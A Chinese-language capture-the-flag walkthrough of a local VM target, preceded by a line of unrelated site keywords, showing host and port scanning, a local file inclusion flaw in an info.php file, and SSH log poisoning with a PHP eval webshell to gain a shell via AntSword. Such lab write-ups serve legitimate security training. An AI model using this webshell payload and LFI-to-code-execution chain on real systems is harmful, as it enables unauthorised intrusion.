考试网站怎么做的,wordpress不居中,广告设计培训班有用吗,南山区住房和建设局网站官网一、导入靶机
将下载好的靶机拖入到VMware中#xff0c;填写靶机机名称(随便起一个)和路径 虚拟机设置里修改网络状态为NAT模式 二、信息收集
1、主机发现
用御剑扫描工具扫描虚拟机的NAT网段#xff0c;发现靶机的IP是192.168.204.141 2、端口扫描
用御剑端口扫描扫描全…一、导入靶机
将下载好的靶机拖入到VMware中填写靶机机名称(随便起一个)和路径 虚拟机设置里修改网络状态为NAT模式 二、信息收集
1、主机发现
用御剑扫描工具扫描虚拟机的NAT网段发现靶机的IP是192.168.204.141 2、端口扫描
用御剑端口扫描扫描全端口
发现21、2211、80、25、1100和8888端口开启 3、访问Web服务
网页上访问192.168.204.141出现一个大特码头 访问192.168.47.129:8888弹出一个登录框 4、目录扫描
使用kali的dirb进行目录扫描dirb http://192.168.204.141/
扫描结果如下 访问antibot_image目录 发现有一个info.php文件 点开发现是一个PHP的探针文件 查看info.php的网页源码发现存在文件包含漏洞 三、漏洞利用
在URL后面输入 ?image/etc/passwd 用image参数传入想要获取的文件路径
成功显示说明存在文件包含漏洞 前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的所以使用kali命令扫描nmap -A 192.168.204.141 -p-
扫描出来2211是ssh远程连接端口 此时我们报错连接 2211
ssh ?php eval($_POST[cmd]);?192.168.204.141 -p 2211 然后在网页端查看ubuntu报错信息/var/log/auth.log
/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录还是通过 sudo 执行命令都会在 auth.log 中产生记录。
该目录下发现多了一些报错信息木马大概率写入成功 使用蚁剑进行连接上传了一句话木马的路径
http://192.168.204.141/antibot_image/antibots/info.php?image/var/log/auth.log
连接密码是刚刚POST传入的cmd 成功登陆到靶机